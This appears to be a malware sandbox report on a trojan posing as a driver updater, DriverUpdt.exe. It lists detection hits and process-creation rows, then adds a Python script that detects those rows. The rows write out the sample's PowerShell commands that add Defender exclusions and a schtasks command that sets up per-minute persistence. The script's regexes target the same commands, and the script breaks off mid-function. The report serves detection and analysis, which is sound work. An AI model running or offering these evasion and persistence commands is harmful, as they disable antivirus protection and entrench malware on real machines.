Source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.DriverUpdt.exe.12ff1a78.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
Note: the AsyncRAT rule hits do not contradict the XWorm classification of this sample. XWorm is built on AsyncRAT code, so generic AsyncRAT Yara rules such as this one commonly fire on XWorm builds as well; treat the family name from the extracted configuration as authoritative.
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\DriverUpdt.exe | Code function: 0_2_00007FF848F016E9
Source: C:\Users\user\Desktop\DriverUpdt.exe | Code function: 0_2_00007FF848F06E42
Source: C:\Users\user\Desktop\DriverUpdt.exe | Code function: 0_2_00007FF848F02361
Source: C:\Users\user\Desktop\DriverUpdt.exe | Code function: 0_2_00007FF848F06096
Source: C:\Users\user\Desktop\DriverUpdt.exe | Code function: 0_2_00007FF848F020C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848FF30E9
Source: C:\Users\user\AppData\Roaming\DriverUpdt | Code function: 16_2_00007FF848F10E5E
Source: C:\Users\user\AppData\Roaming\DriverUpdt | Code function: 16_2_00007FF848F116E9
Source: C:\Users\user\AppData\Roaming\DriverUpdt | Code function: 16_2_00007FF848F120C1
Source: C:\Users\user\AppData\Roaming\DriverUpdt | Code function: 20_2_00007FF848F10E5E
Source: C:\Users\user\AppData\Roaming\DriverUpdt | Code function: 20_2_00007FF848F116E9
Source: C:\Users\user\AppData\Roaming\DriverUpdt | Code function: 20_2_00007FF848F120C1
Source: DriverUpdt.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DriverUpdt.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.DriverUpdt.exe.12ff1a78.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: DriverUpdt.exe, rUq6Jc02GU46qh62C4zZA7O1E0dXcVGvvO.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DriverUpdt.exe, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DriverUpdt.exe, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DriverUpdt.0.dr, rUq6Jc02GU46qh62C4zZA7O1E0dXcVGvvO.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DriverUpdt.0.dr, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DriverUpdt.0.dr, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, rUq6Jc02GU46qh62C4zZA7O1E0dXcVGvvO.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: DriverUpdt.exe, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csBase64 encoded string: 'Wzyx3ogwisD56ZHkeZYkSrNpO3P9J9Ya4nyydoyDoMhqYbxKcIuCBE6nN3TYLZ2YGky5qwMVXBL9OzBj6saB', 'pEkzOAOMKFgZeEjnqyOdb2Nj9rg4fsl4Zisct4e8rZI8GpWTmVRpZXVefi66KO0FkTsZhrE3OUXpJalOj9B4', 'lGz07EJSsiEZHWKf405VC86ML0pFtcYa9DnDdlCrv8J198USUtFcC4ga0h6D3ane7yoXgP11tbBX4iDkUJeS', 'uzJDSqDxIrlZJqgOgwwy02Dz2doW9zNtgu1RZfT5wLgCGy8fQt7HHJ5u3k7cpPtrQjj193zWKo4RHGr1PzX7', 'kqsk7TjkQbOMRQH2P9ywEPNbF2r2incAMN3K1h9sJhx31ygvXxpPnN8wj2WFZsTUvvige5ObtRYEs6EG9D5d', 'P3jsV4lZMIEXKaHtWScW7lMfH1M7bVzOGpyPzhtflSe30EwumuBRdb6vTpfKTXnCs0EyLA83RPn8nmd7hA8r', 'k4IiQb8aZFjA4MsRFkE6P0TsgsiT9f6t02Ntz9sOgXWs0Nq6T70LKbhfkD5ShI8LUSrbaaQww9YO7IZrSXnF', 'xvJbDZCgm7lSnBhfxWOa8zS4w0526chcn7corNxa5cWF1mWYKadtQLF52nm6cGvwuyZd0azWMYzWeLS9lcev', 'Kj3Vb6PzHn9v07t3S0MWBznTXF1PkRT8IPHe7b7iUzNIQpLOGQIuf7Qw6sSjOHLy50aTBV6HbQz1FEQxMDre', 'QKbzE0YySm8lR0erhsq4rtsTMCTOH8uWKlTWQEr6qzkkxB0tXX13kESSZQ0TzkUiVIYEu9h6AFhoAozuHLGP'
                      Source: DriverUpdt.exe, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csBase64 encoded string: 'uJIvKPRumgeUE7Cj6DUpv9OS9X3euISjlVu8QNQtltUm2IG3Y0JmlsPYPr5ci66SF5osCsrOnJPEtcePD1G1', 'XeZ2r4uLure0d6onZjoTUSlru3HjQ20XzQZ05KOuHMRAI6ctSnZGwEZJRRG3M7UxX1RD9uBRKZCu43NqpXe9'
                      Source: DriverUpdt.exe, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csBase64 encoded string: 'RjaJGu3nFKjVX0HwnYwB9ectK5a6EyZDqeBpbfJVcWXzgU7cxwmplntKZbqu70u0hbw0FnnivfvskcF74o3X', 'IvZAem83h4vgpUmTHT5k0SVSUCWlugncvsAt7ObcW3MuzF5eUytFamzZuiXrAub6g02Vm5QmfvQ2cwbqj4la', 'JehyPCnBuflDs2d0ZYefcjO4JfBTQCC4HLKDhjmywyJhsaF0ReTf1GJEjxEzRWayaHAHaLzPSew8mvgAY6FW'
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csBase64 encoded string: 'QgYbC2WdwKektmrwVSQXk6yB1NWvPEcjEeToyahhlq2wGd2keQrLxcDZTSUuhiqBwcodSszv1cFVZTcbLUYG', 'LOItW6SfTfvWaylwjhr8yEPSu2oJNoipfHWhndegtyONdycme84WEpTTBJJRvJ2U0rJMqbypLQZqriyuT7ZF', 't4S9tOQRYlNxhhE3lGaEFj9w0rrpGEgUSTZZoE66qxJZ7b8bKsn3G7Mt5X3S0ek8qgwVxv0K2Nh0JtU10dzU', 'Gr0dgRT9Isqyej2OaWxQTnFzKcx1kBFZ5uOIm80jhCWNMjPhceWcm9NnYdffK4fsEtvcysr7sg1JiNCeAf8F', 'NlazytOCkJxJwpVPk1IrAOFlMhiOhspVn63UIEtpMtwhm3FYRAiovb3P0X46ChDgHL0EIk7IlbjJnl1lAeS7', 'NUuBK0NmuFzZbbySSf5FK8kHSSZm0lufbsLrlhDw5HpjaxmbDuT0LtPUl0dFcrMkO9oaw5pmkxmCP9GSEUPg', 'hiHZ8Pnec7U0fALizQIaJmM6g8cZwU9aRArhJKGki3eSsi1UsFEfwmhnDyDHSgK1m4pfZlBfNclcdrv7bGOQ', 'tMDOOGYeG5UTwVFxUwxNGqt9UgalFlhCPr2mz5FNJOQTPvRS97rqk0cdnmliTYB2t7MMupqVM3IJOmtdq0Y7', 'rirOR0AtWALUZeGM2S5EWjWocdeAroBLyFZ79l6Q2bnUw3TvKnxQ0OvfPOdvMFlZbOQj5fQM5duB2nBRcjaB'
                      Source: DriverUpdt.0.dr, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csBase64 encoded string: 'Wzyx3ogwisD56ZHkeZYkSrNpO3P9J9Ya4nyydoyDoMhqYbxKcIuCBE6nN3TYLZ2YGky5qwMVXBL9OzBj6saB', 'pEkzOAOMKFgZeEjnqyOdb2Nj9rg4fsl4Zisct4e8rZI8GpWTmVRpZXVefi66KO0FkTsZhrE3OUXpJalOj9B4', 'lGz07EJSsiEZHWKf405VC86ML0pFtcYa9DnDdlCrv8J198USUtFcC4ga0h6D3ane7yoXgP11tbBX4iDkUJeS', 'uzJDSqDxIrlZJqgOgwwy02Dz2doW9zNtgu1RZfT5wLgCGy8fQt7HHJ5u3k7cpPtrQjj193zWKo4RHGr1PzX7', 'kqsk7TjkQbOMRQH2P9ywEPNbF2r2incAMN3K1h9sJhx31ygvXxpPnN8wj2WFZsTUvvige5ObtRYEs6EG9D5d', 'P3jsV4lZMIEXKaHtWScW7lMfH1M7bVzOGpyPzhtflSe30EwumuBRdb6vTpfKTXnCs0EyLA83RPn8nmd7hA8r', 'k4IiQb8aZFjA4MsRFkE6P0TsgsiT9f6t02Ntz9sOgXWs0Nq6T70LKbhfkD5ShI8LUSrbaaQww9YO7IZrSXnF', 'xvJbDZCgm7lSnBhfxWOa8zS4w0526chcn7corNxa5cWF1mWYKadtQLF52nm6cGvwuyZd0azWMYzWeLS9lcev', 'Kj3Vb6PzHn9v07t3S0MWBznTXF1PkRT8IPHe7b7iUzNIQpLOGQIuf7Qw6sSjOHLy50aTBV6HbQz1FEQxMDre', 'QKbzE0YySm8lR0erhsq4rtsTMCTOH8uWKlTWQEr6qzkkxB0tXX13kESSZQ0TzkUiVIYEu9h6AFhoAozuHLGP'
                      Source: DriverUpdt.0.dr, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csBase64 encoded string: 'uJIvKPRumgeUE7Cj6DUpv9OS9X3euISjlVu8QNQtltUm2IG3Y0JmlsPYPr5ci66SF5osCsrOnJPEtcePD1G1', 'XeZ2r4uLure0d6onZjoTUSlru3HjQ20XzQZ05KOuHMRAI6ctSnZGwEZJRRG3M7UxX1RD9uBRKZCu43NqpXe9'
                      Source: DriverUpdt.0.dr, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csBase64 encoded string: 'RjaJGu3nFKjVX0HwnYwB9ectK5a6EyZDqeBpbfJVcWXzgU7cxwmplntKZbqu70u0hbw0FnnivfvskcF74o3X', 'IvZAem83h4vgpUmTHT5k0SVSUCWlugncvsAt7ObcW3MuzF5eUytFamzZuiXrAub6g02Vm5QmfvQ2cwbqj4la', 'JehyPCnBuflDs2d0ZYefcjO4JfBTQCC4HLKDhjmywyJhsaF0ReTf1GJEjxEzRWayaHAHaLzPSew8mvgAY6FW'
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csBase64 encoded string: 'QgYbC2WdwKektmrwVSQXk6yB1NWvPEcjEeToyahhlq2wGd2keQrLxcDZTSUuhiqBwcodSszv1cFVZTcbLUYG', 'LOItW6SfTfvWaylwjhr8yEPSu2oJNoipfHWhndegtyONdycme84WEpTTBJJRvJ2U0rJMqbypLQZqriyuT7ZF', 't4S9tOQRYlNxhhE3lGaEFj9w0rrpGEgUSTZZoE66qxJZ7b8bKsn3G7Mt5X3S0ek8qgwVxv0K2Nh0JtU10dzU', 'Gr0dgRT9Isqyej2OaWxQTnFzKcx1kBFZ5uOIm80jhCWNMjPhceWcm9NnYdffK4fsEtvcysr7sg1JiNCeAf8F', 'NlazytOCkJxJwpVPk1IrAOFlMhiOhspVn63UIEtpMtwhm3FYRAiovb3P0X46ChDgHL0EIk7IlbjJnl1lAeS7', 'NUuBK0NmuFzZbbySSf5FK8kHSSZm0lufbsLrlhDw5HpjaxmbDuT0LtPUl0dFcrMkO9oaw5pmkxmCP9GSEUPg', 'hiHZ8Pnec7U0fALizQIaJmM6g8cZwU9aRArhJKGki3eSsi1UsFEfwmhnDyDHSgK1m4pfZlBfNclcdrv7bGOQ', 'tMDOOGYeG5UTwVFxUwxNGqt9UgalFlhCPr2mz5FNJOQTPvRS97rqk0cdnmliTYB2t7MMupqVM3IJOmtdq0Y7', 'rirOR0AtWALUZeGM2S5EWjWocdeAroBLyFZ79l6Q2bnUw3TvKnxQ0OvfPOdvMFlZbOQj5fQM5duB2nBRcjaB'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csBase64 encoded string: 'Wzyx3ogwisD56ZHkeZYkSrNpO3P9J9Ya4nyydoyDoMhqYbxKcIuCBE6nN3TYLZ2YGky5qwMVXBL9OzBj6saB', 'pEkzOAOMKFgZeEjnqyOdb2Nj9rg4fsl4Zisct4e8rZI8GpWTmVRpZXVefi66KO0FkTsZhrE3OUXpJalOj9B4', 'lGz07EJSsiEZHWKf405VC86ML0pFtcYa9DnDdlCrv8J198USUtFcC4ga0h6D3ane7yoXgP11tbBX4iDkUJeS', 'uzJDSqDxIrlZJqgOgwwy02Dz2doW9zNtgu1RZfT5wLgCGy8fQt7HHJ5u3k7cpPtrQjj193zWKo4RHGr1PzX7', 'kqsk7TjkQbOMRQH2P9ywEPNbF2r2incAMN3K1h9sJhx31ygvXxpPnN8wj2WFZsTUvvige5ObtRYEs6EG9D5d', 'P3jsV4lZMIEXKaHtWScW7lMfH1M7bVzOGpyPzhtflSe30EwumuBRdb6vTpfKTXnCs0EyLA83RPn8nmd7hA8r', 'k4IiQb8aZFjA4MsRFkE6P0TsgsiT9f6t02Ntz9sOgXWs0Nq6T70LKbhfkD5ShI8LUSrbaaQww9YO7IZrSXnF', 'xvJbDZCgm7lSnBhfxWOa8zS4w0526chcn7corNxa5cWF1mWYKadtQLF52nm6cGvwuyZd0azWMYzWeLS9lcev', 'Kj3Vb6PzHn9v07t3S0MWBznTXF1PkRT8IPHe7b7iUzNIQpLOGQIuf7Qw6sSjOHLy50aTBV6HbQz1FEQxMDre', 'QKbzE0YySm8lR0erhsq4rtsTMCTOH8uWKlTWQEr6qzkkxB0tXX13kESSZQ0TzkUiVIYEu9h6AFhoAozuHLGP'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csBase64 encoded string: 'uJIvKPRumgeUE7Cj6DUpv9OS9X3euISjlVu8QNQtltUm2IG3Y0JmlsPYPr5ci66SF5osCsrOnJPEtcePD1G1', 'XeZ2r4uLure0d6onZjoTUSlru3HjQ20XzQZ05KOuHMRAI6ctSnZGwEZJRRG3M7UxX1RD9uBRKZCu43NqpXe9'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csBase64 encoded string: 'RjaJGu3nFKjVX0HwnYwB9ectK5a6EyZDqeBpbfJVcWXzgU7cxwmplntKZbqu70u0hbw0FnnivfvskcF74o3X', 'IvZAem83h4vgpUmTHT5k0SVSUCWlugncvsAt7ObcW3MuzF5eUytFamzZuiXrAub6g02Vm5QmfvQ2cwbqj4la', 'JehyPCnBuflDs2d0ZYefcjO4JfBTQCC4HLKDhjmywyJhsaF0ReTf1GJEjxEzRWayaHAHaLzPSew8mvgAY6FW'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csBase64 encoded string: 'QgYbC2WdwKektmrwVSQXk6yB1NWvPEcjEeToyahhlq2wGd2keQrLxcDZTSUuhiqBwcodSszv1cFVZTcbLUYG', 'LOItW6SfTfvWaylwjhr8yEPSu2oJNoipfHWhndegtyONdycme84WEpTTBJJRvJ2U0rJMqbypLQZqriyuT7ZF', 't4S9tOQRYlNxhhE3lGaEFj9w0rrpGEgUSTZZoE66qxJZ7b8bKsn3G7Mt5X3S0ek8qgwVxv0K2Nh0JtU10dzU', 'Gr0dgRT9Isqyej2OaWxQTnFzKcx1kBFZ5uOIm80jhCWNMjPhceWcm9NnYdffK4fsEtvcysr7sg1JiNCeAf8F', 'NlazytOCkJxJwpVPk1IrAOFlMhiOhspVn63UIEtpMtwhm3FYRAiovb3P0X46ChDgHL0EIk7IlbjJnl1lAeS7', 'NUuBK0NmuFzZbbySSf5FK8kHSSZm0lufbsLrlhDw5HpjaxmbDuT0LtPUl0dFcrMkO9oaw5pmkxmCP9GSEUPg', 'hiHZ8Pnec7U0fALizQIaJmM6g8cZwU9aRArhJKGki3eSsi1UsFEfwmhnDyDHSgK1m4pfZlBfNclcdrv7bGOQ', 'tMDOOGYeG5UTwVFxUwxNGqt9UgalFlhCPr2mz5FNJOQTPvRS97rqk0cdnmliTYB2t7MMupqVM3IJOmtdq0Y7', 'rirOR0AtWALUZeGM2S5EWjWocdeAroBLyFZ79l6Q2bnUw3TvKnxQ0OvfPOdvMFlZbOQj5fQM5duB2nBRcjaB'
Source: DriverUpdt.exe, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DriverUpdt.exe, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DriverUpdt.0.dr, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DriverUpdt.0.dr, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@21/25@2/3
Source: C:\Users\user\Desktop\DriverUpdt.exe | File created: C:\Users\user\AppData\Roaming\DriverUpdt
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
Source: C:\Users\user\AppData\Roaming\DriverUpdt | Mutant created: NULL
Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Users\user\Desktop\DriverUpdt.exe | Mutant created: \Sessions\1\BaseNamedObjects\4fPEH1k67YijypJe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Users\user\Desktop\DriverUpdt.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: DriverUpdt.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DriverUpdt.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\DriverUpdt.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\DriverUpdt.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DriverUpdt.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\Desktop\DriverUpdt.exe | File read: C:\Users\user\Desktop\DriverUpdt.exe
Source: unknown | Process created: C:\Users\user\Desktop\DriverUpdt.exe "C:\Users\user\Desktop\DriverUpdt.exe"
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\DriverUpdt C:\Users\user\AppData\Roaming\DriverUpdt
Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\DriverUpdt C:\Users\user\AppData\Roaming\DriverUpdt
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe'
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt'
Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"
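The process-creation rows above show the whole defence-evasion and persistence chain in five child processes: four `powershell.exe -ExecutionPolicy Bypass Add-MpPreference` calls that exclude the dropper, the dropped copy and both process names from Defender, followed by a `schtasks /create /RL HIGHEST /sc minute /mo 1` task that relaunches the dropped copy from the user profile every minute. The script below is an added detection example, not part of the Joe Sandbox report or of the sample; it runs the rules a SOC would write for this chain over a constructed event list copied from those rows (plus one benign control event), and correlates the excluded path with the scheduled-task target. The `SAMPLE_EVENTS` tuples, the regexes and the severity thresholds are this example's own assumptions; the same `analyze()` works on (parent image, child image, command line) triples exported from Sysmon Event ID 1 or Security 4688.

```python
"""Flag the Defender-exclusion + scheduled-task persistence chain from the report.

Added example (not the report's or the sample's code). Events are constructed
from the "Process created" rows of the report so the script runs offline.
"""
import re
from dataclasses import dataclass

PARENT = r"C:\Users\user\Desktop\DriverUpdt.exe"
PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference '

# Constructed sample: (parent image, child image, command line), copied from the
# report rows above, plus one benign control that must produce no finding.
SAMPLE_EVENTS = [
    (PARENT, "powershell.exe", PS + r"-ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'"),
    (PARENT, "powershell.exe", PS + r"-ExclusionProcess 'DriverUpdt.exe'"),
    (PARENT, "powershell.exe", PS + r"-ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'"),
    (PARENT, "powershell.exe", PS + r"-ExclusionProcess 'DriverUpdt'"),
    (PARENT, "schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
     r'/tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"'),
    (r"C:\Windows\explorer.exe", "powershell.exe", r'"powershell.exe" Get-Process'),  # benign control
]

# Assumed detection patterns (this example's own, not from the report).
EXCLUSION_RE = re.compile(r"""Add-MpPreference\b.*?-Exclusion(Path|Process|Extension|IpAddress)\s+['"]?([^'"]+)""", re.I)
BYPASS_RE = re.compile(r"-ExecutionPolicy\s+Bypass", re.I)
SCHTASKS_RE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.I)
TASK_TARGET_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_RL_RE = re.compile(r"/RL\s+HIGHEST\b", re.I)
TASK_MINUTE_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)


@dataclass
class Finding:
    rule: str
    parent: str
    value: str
    severity: str
    detail: str = ""


def analyze(events):
    """events: iterable of (parent_image, child_image, command_line). Returns a list of Finding."""
    findings = []
    exclusions = {}      # lowercased excluded path/process -> parent that added it
    task_targets = []
    for parent, _image, cmdline in events:
        m = EXCLUSION_RE.search(cmdline)
        if m:
            kind, value = m.group(1), m.group(2).strip()
            # Exclusion added under -ExecutionPolicy Bypass by a non-shell parent is the
            # pattern in this report; a plain Add-MpPreference from an admin shell rates lower.
            sev = "high" if BYPASS_RE.search(cmdline) else "medium"
            findings.append(Finding("defender_exclusion_added", parent, f"{kind}={value}", sev))
            exclusions[value.lower()] = parent
        if SCHTASKS_RE.search(cmdline):
            t = TASK_TARGET_RE.search(cmdline)
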